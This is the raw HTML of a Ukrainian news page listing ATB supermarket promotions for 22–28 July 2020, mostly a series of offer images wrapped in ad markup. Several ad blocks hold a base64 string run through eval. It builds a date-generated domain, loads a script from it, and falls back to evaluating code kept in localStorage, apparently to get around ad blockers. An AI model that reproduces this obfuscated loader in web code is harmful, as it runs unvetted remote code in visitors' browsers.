<!DOCTYPE html><html lang="uk-ua" dir="ltr" prefix="og: http://ogp.me/ns# fb: http://www.facebook.com/2008/fbml og: http://opengraphprotocol.org/schema/"><head><link rel="preload" href="https://nikopolnews.net/media/jui/fonts/IcoMoon.woff" as="font" type="font/woff" crossorigin><meta name="theme-color" content="#31989c"><link rel="alternate" href='android-app://news.nikopolnews.net' /><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="manifest" href="/site.webmanifest"><link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"><meta name="msapplication-TileColor" content="#31989c"><script async src="https://code.jquery.com/jquery-latest.min.js"></script><script async custom-element="amp-ad" src="https://cdn.ampproject.org/v0/amp-ad-0.1.js"></script><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta charset="utf-8" /><base href="https://nikopolnews.net/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya" /><meta name="rights" content="Источник: https://nikopolnews.net" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:description" content="С 22 по 28 июля включительно в супермаркетах АТБ  будет действовать ряд акций, которые позволят купить многие товары дешевле, чем обычно.  NNS  публи" /><meta name="twitter:title" content="Акции в супермаркетах АТБ с 22 по 28 июля" /><meta name="twitter:site" content="@newsnikopol" /><meta name="twitter:creator" content="@newsnikopol" /><meta name="twitter:image:src" content="https://nikopolnews.net/images/2020/atb-magazin-koblevo-market.jpg" /><meta name="author" content="NNS - Національна служба новин" /><meta property="og:locale" content="uk_UA" /><meta property="og:type" content="article" /><meta property="og:title" content="Акции в супермаркетах АТБ с 22 по 28 июля" /><meta property="og:description" content="С 22 по 28 июля включительно в супермаркетах АТБ  будет действовать ряд акций, которые позволят купить многие товары дешевле, чем обычно.  NNS  публи" /><meta property="og:url" content="https://nikopolnews.net/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya" /><meta property="og:site_name" content="NNS - Національна служба новин" /><meta property="og:image" content="https://nikopolnews.net/images/2020/atb-magazin-koblevo-market.jpg" /><meta property="og:image:width" content="758" /><meta property="og:image:height" content="505" /><meta property="og:headline" content="Акции в супермаркетах АТБ с 22 по 28 июля" /><meta property="og:updated_time" content="2020-07-21T17:03:01+01:00" /><meta property="article:modified_time" content="2020-07-21T17:03:01+01:00" /><meta property="article:published_time" content="2020-07-21T17:01:21+01:00" /><meta property="article:section" content="Економіка" /><meta property="news_keywords" content="акции, атб, наличия, условии, действуют, напоминает, супермаркетов, обычно,  администрация, «экономия»" /><meta property="article:tag" content="акции" /><meta property="article:tag" content="атб" /><meta property="article:tag" content="наличия" /><meta property="article:tag" content="условии" /><meta property="article:tag" content="действуют" /><meta property="article:tag" content="напоминает" /><meta property="article:tag" content="супермаркетов" /><meta property="article:tag" content="обычно" /><meta property="article:tag" content=" администрация" /><meta property="article:tag" content="«экономия»" /><meta property="article:publisher" content="https://www.facebook.com/nikopolnews" /><meta name="description" content="С 22 по 28 июля включительно в супермаркетах АТБ  будет действовать ряд акций, которые позволят купить многие товары дешевле, чем обычно.  NNS  публи" /><title>Акции в супермаркетах АТБ с 22 по 28 июля | NNS - Національна служба новин</title><link href="https://nikopolnews.net/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya/amp" rel="amphtml" /><link href="/templates/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" /><link href="https://www.google.com" rel="dns-prefetch preconnect" /><link href="https://www.google-analytics.com" rel="dns-prefetch preconnect" /><link href="https://www.googletagmanager.com" rel="dns-prefetch preconnect" /><link href="https://fonts.googleapis.com" rel="dns-prefetch preconnect" /><link href="https://pagead2.googlesyndication.com" rel="dns-prefetch preconnect" /><link href="https://googleads.g.doubleclick.net" rel="dns-prefetch preconnect" /><link href="https://tpc.googlesyndication.com" rel="dns-prefetch preconnect" /><link href="https://adservice.google.com" rel="dns-prefetch preconnect" /><link href="https://partner.googleadservices.com" rel="dns-prefetch preconnect" /><link href="https://www.youtube.com" rel="dns-prefetch preconnect" /><link href="https://i.ytimg.com" rel="dns-prefetch preconnect" /><link href="https://s.ytimg.com" rel="dns-prefetch preconnect" /><link href="https://yt3.ggpht.com" rel="dns-prefetch preconnect" /><link href="https://fonts.gstatic.com" rel="dns-prefetch preconnect" /><link href="https://graph.facebook.com" rel="dns-prefetch preconnect" /><link href="https://userapi.com" rel="dns-prefetch preconnect" /><link href="https://vk.com" rel="dns-prefetch preconnect" /><link href="https://nikopolnews.net/index.php/components/jursspublisher/yatableau" rel="yandex-tableau-widget" /><link href="/templates/protostar/css/template.css?c441cf9348c4eb401ead79971c5137ca" rel="stylesheet" /><link href="https://nikopolnews.net/templates/protostar/html/mod_junewsultra/default/css/style.css" rel="stylesheet" /> <!--[if lt IE 9]><script src="/media/jui/js/html5-uncompressed.js?c441cf9348c4eb401ead79971c5137ca"></script><![endif]--><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"WebPage","name":"\u0410\u043a\u0446\u0438\u0438 \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411 \u0441 22 \u043f\u043e 28 \u0438\u044e\u043b\u044f","speakable":{"@type":"SpeakableSpecification","xpath":["\/html\/head\/title","\/html\/head\/meta[@name='description']\/@content"]},"url":"https:\/\/nikopolnews.net\/ukraina\/44-ekonomika\/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya"}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"NewsArticle","headline":"\u0410\u043a\u0446\u0438\u0438 \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411 \u0441 22 \u043f\u043e 28 \u0438\u044e\u043b\u044f","name":"\u0410\u043a\u0446\u0438\u0438 \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411 \u0441 22 \u043f\u043e 28 \u0438\u044e\u043b\u044f","description":"\u0421 22 \u043f\u043e 28\u00a0\u0438\u044e\u043b\u044f \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411\u00a0 \u0431\u0443\u0434\u0435\u0442\u00a0\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c\u00a0\u0440\u044f\u0434 \u0430\u043a\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0442 \u043a\u0443\u043f\u0438\u0442\u044c \u043c\u043d\u043e\u0433\u0438\u0435 \u0442\u043e\u0432\u0430\u0440\u044b \u0434\u0435\u0448\u0435\u0432\u043b\u0435, \u0447\u0435\u043c \u043e\u0431\u044b\u0447\u043d\u043e.\u00a0 NNS\u00a0\u00a0\u043f\u0443\u0431\u043b\u0438","articleBody":"\r\n\r\n\u0421 22 \u043f\u043e 28&nbsp;\u0438\u044e\u043b\u044f \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432 \u0441\u0443\u043f\u0435\u0440\u043c\u0430\u0440\u043a\u0435\u0442\u0430\u0445 \u0410\u0422\u0411&nbsp; \u0431\u0443\u0434\u0435\u0442&nbsp;\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c&nbsp;\u0440\u044f\u0434 \u0430\u043a\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0442 \u043a\u0443\u043f\u0438\u0442\u044c \u043c\u043d\u043e\u0433\u0438\u0435 \u0442\u043e\u0432\u0430\u0440\u044b \u0434\u0435\u0448\u0435\u0432\u043b\u0435, \u0447\u0435\u043c \u043e\u0431\u044b\u0447\u043d\u043e.&nbsp;\r\n\r\n","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/nikopolnews.net\/ukraina\/44-ekonomika\/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya"},"thumbnailUrl":"https:\/\/nikopolnews.net\/images\/2020\/atb-magazin-koblevo-market.jpg","image":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/2020\/atb-magazin-koblevo-market.jpg","height":505,"width":758},"dateCreated":"2020-07-21T17:01:21+01:00","dateModified":"2020-07-21T17:03:01+01:00","datePublished":"2020-07-21T17:01:21+01:00","interactionCount":"63545","author":{"@type":"Person","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d"},"publisher":{"@type":"Organization","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d","logo":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/thumbnails\/60060.png","height":60,"width":600}}}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"WebSite","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d","url":"https:\/\/nikopolnews.net\/","potentialAction":{"@type":"SearchAction","target":"https:\/\/nikopolnews.net\/component\/search\/{search_term_string}","query-input":"required name=search_term_string"}}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/nikopolnews.net\/","logo":"https:\/\/nikopolnews.net\/images\/jamp\/6789.jpg"}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Organization","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d","url":"https:\/\/nikopolnews.net\/","sameAs":[["https:\/\/www.facebook.com\/groups\/nikopolnews\/","https:\/\/vk.com\/nikopolnews","https:\/\/twitter.com\/newsnikopol","https:\/\/ok.ru\/nikopolnews","https:\/\/www.youtube.com\/channel\/UCCn7a3nLMjM_jwuuzacJfOQ?view_as=subscriber","https:\/\/nikopolnews.net","https:\/\/t.me\/nikopolnews","https:\/\/play.google.com\/store\/apps\/details?id=news.nikopolnews.net"]]}</script><meta itemprop="telephone" content="+38 (095) 325-96-00"><meta itemprop="address" content="Нікополь, Дніпропетровска область"><meta property="fb:pages" content="345025019030473" /><meta property="fb:article_style" content="default"><meta property="fb:use_automatic_ad_placement" content="enable=true ad_density=default"></head><body class="site com_content view-article no-layout no-task itemid-125"><style type="text/css">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</style><div class="body" id="top"><nav class="navigation" role="navigation"><input type="checkbox" id="nav-toggle" hidden><nav class="nav"><label for="nav-toggle" class="nav-toggle" onclick><div class="men">меню</div></label><div class="fb"> <a href="https://www.facebook.com/pg/nacnews/posts/?ref=page_internal" target="_blank"> <i class="fa fa-facebook-square"></i> </a></div><div class="rss"> <a href="https://www.youtube.com/channel/UCCn7a3nLMjM_jwuuzacJfOQ?sub_confirmation=1" target="_blank"> <i class="fa fa-youtube-square"></i> </a></div><div class="header-search pull-right"><form action="/nikopol" method="post" class="form-inline" role="search"> <label for="mod-search-searchword87" class="element-invisible">Шукати...</label> <input name="searchword" id="mod-search-searchword87" maxlength="200" class="inputbox search-query input-medium" type="search" size="20" placeholder="Пошук..."> <input type="hidden" name="task" value="search"> <input type="hidden" name="option" value="com_search"> <input type="hidden" name="Itemid" value="122"></form></div><ul><li><a href="/region">Регіони</a><li><a href="/ukraina">Україна</a><li><a href="/mir">Світ</a><li><a href="/politika">Політика</a><li><a href="/obshchestvo">Суспільство</a><li><a href="/zhkkh">ЖКГ</a><li><a href="/ekonomika">Економіка</a><li><a href="/proisshestviya">Події</a><li><a href="/dosug">Дозвілля</a><li><a href="/priroda">Природа</a><li><a href="/doska-ob-yavlenij">Корисна інформація</a><li><a href="/zhiznennoe">Життєве</a></ul></nav><div class="brandsmail"> <a href="/"><img src="/templates/protostar/images/shapkasmail.png" width="auto" /></a></div></nav><header class="header" role="banner"><div id="logo-small"><script type="text/javascript">
window.onload = function(){
  document.getElementById('close').onclick = function(){
    this.parentNode.parentNode.parentNode
    .removeChild(this.parentNode.parentNode);
    return false;
  };
};	</script><div class="tizer"> <span id='close'>x</span><div id="Pw5OE9U5dOP8cKUpNoMQ" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'reuckvv.pro';</script><script defer src="//reuckvv.pro/HBsr/CV8D.js" ></script></div></div></header><div class="container"><div class="shapkaright2"><script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="8434922785" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="8434922785" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div><div class="shapkaright3"></div><div class="row-fluid"><main id="content" role="main" class="span9"><div id="forajax"><div id="system-message-container"></div><div class="shapkaright2"></div><div class="item-page_top_bg"></div><div class="texst"><div class="item-page"><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad><h1><div class="titletexst"> <a href="/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-15-po-21-iyulya"> Акции в супермаркетах АТБ с 22 по 28 июля</a></div></h1><dl class="article-info"><dd class="create"> <span class="icon-calendar" aria-hidden="true"></span> <SPAN>21 лип. 2020</SPAN></dd><dd class="hits"> <span class="icon-eye-open" aria-hidden="true"></span> Перегляди: 63545</dd><ul class="tags inline"><li class="tag-8 tag-list0" itemprop="keywords"> <a href="/component/tags/tag/ekonomika" class="label label-info"> Економіка </a></li></ul></dl><p style="text-align: center; font-size: 0.9em; margin-bottom: 4px;"><a href="https://play.google.com/store/apps/details?id=news.nikopolnews.net" target="_blank" rel="noopener noreferrer">Завантажте</a> мобільний додаток сайту</p><div class="shapkaright2"></div><div class="konteyner"><p><img alt="" class="ampmetaimage smartresize" src="https://nikopolnews.net/images/2020/atb-magazin-koblevo-market.jpg" /></p><div align="center"><div class="addsensebr"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9114363492" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9114363492" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p>С 22 по 28&nbsp;июля включительно в супермаркетах АТБ&nbsp; будет&nbsp;действовать&nbsp;ряд акций, которые позволят купить многие товары дешевле, чем обычно.&nbsp;</p><div align="center"><div class="meta"></div></div><p><a href="https://nikopolnews.net/sitemap" target="_blank">NNS</a>&nbsp;&nbsp;публикует&nbsp;предложения от АТБ в рамках акции «Экономия».&nbsp;Администрация сети супермаркетов напоминает, что акции действуют при условии наличия товара.</p><div align="center"><div class="addsensebrslon"><div id="MIXADV_6615" class="MIXADVERT_NET"></div><script>
     var node6615 = document.getElementById("MIXADV_6615");
     if( node6615 )
     {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6615&r="+Math.random();
        node6615.parentNode.appendChild(script);
        script.onerror = function(){
         window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY2MTUgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjYxNS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTY2MTUucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY2MTUuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY2MTUiKSkgfSwgNTAwMCk7ICA7fTsg") );
       }
     }
     </script></div></div><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/1(34).JPG" /></p><div align="center"><div class="addsensebr"><script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/2(34).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/3(28).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/4(20).JPG" /></p><div align="center"><div class="addsensebr"><script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/5(20).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/6(14).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/7(16).JPG" /></p><div align="center"><div class="addsensebr"><script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/8(14).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/9(15).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/10(13).JPG" /></p><div align="center"><div class="addsensebr"><script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/11(15).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/12(17).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/13(13).JPG" /></p><div align="center"><div class="addsensebr"><script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/14(13).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/15(11).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/16(10).JPG" /></p><div align="center"><div class="addsensebr"><script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/17(10).JPG" /></p><p style="text-align: center;"><img alt="" class="ampmetaimage smartresize" src="https://nikopol.nikopolnews.net/images/2020/18(10).JPG" /></p><p style="text-align: center;"></p><p><a href="https://t.me/nns_news" target="_blank"><div class="ampmetaimage smartresize" style="cursor: auto;display:inline-block;text-align:center; max-width:759px;"><img style="cursor: auto;" alt="" src="https://nikopolnews.net/images/banners/telegram_banner_thumb_medium759_0.jpg" /></div></a></p><div align="center"><div class="addsensebr"><script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad></div></div><p><strong><span style="color:#ff0000;">Рекламні блоки на нашому сайті дозволяють нам бути незалежним ЗМІ, а вам – отримувати оперативну і не проплачену ніким інформацію. Переглядаючи&nbsp;рекламу, ви робите свій внесок у розвиток незалежної журналістики України</span></strong></p></div><div class="autor"><dd class="createdby"> Автор: NNS - Національна служба новин</dd></div><div id="MIXADV_6625" class="MIXADVERT_NET"></div><script>
     var node6625 = document.getElementById("MIXADV_6625");
     if( node6625 )
     {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6625&r="+Math.random();
        node6625.parentNode.appendChild(script);
        script.onerror = function(){
         window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY2MjUgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjYyNS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTY2MjUucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY2MjUuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY2MjUiKSkgfSwgNTAwMCk7ICA7fTsg") );
       }
     }
     </script><div class="junewsultra "><div class="jn"><div class="jn-head"><h1 class="title_texst"> <a href="/ukraina/41-proisshestviya/17307-propavshuyu-devushku-posle-trekh-dnej-poiska-nashli-v-nore"> Пропавшую девушку после трех дней поиска нашли в норе </a></h1><div class="jn-lefts"> <picture><source srcset="img/758x505/2/a-4dac072f.jpg.webp" type="image/webp"><a href="/ukraina/41-proisshestviya/17307-propavshuyu-devushku-posle-trekh-dnej-poiska-nashli-v-nore"><img loading="lazy" src="https://nikopolnews.net/images/2020/2525871.jpg" alt="Пропавшую девушку после трех дней поиска нашли в норе" class="" ></a></picture></div><div class="jn-right"><div class="jn-info"></div></div></div><div class="jn-intro"> В селе Александровка Винницкой области правоохранители трое суток искали 16-летнюю Наталью Кателян. Девушка пасла скот вместе с мамой, а потом пошла за водой и не вернулась. Спустя трое суток ее нашли застрявшей в лисьей норе. Об этом сообщила пресс-служба полиции...</div><div class="jn-more"> <a href="/ukraina/41-proisshestviya/17307-propavshuyu-devushku-posle-trekh-dnej-poiska-nashli-v-nore" class="readmore" title="">Докладніше</a></div></div></div><div class="addsensebrslon"><div id="QNxCqgITIdu00OUT1JkW" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'reuckvv.pro';</script><script defer src="//reuckvv.pro/ua/Gr.js" ></script></div><div id="MIXADV_7499" class="MIXADVERT_NET"></div><script>
     var node7499 = document.getElementById("MIXADV_7499");
     if( node7499 )
     {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=7499&r="+Math.random();
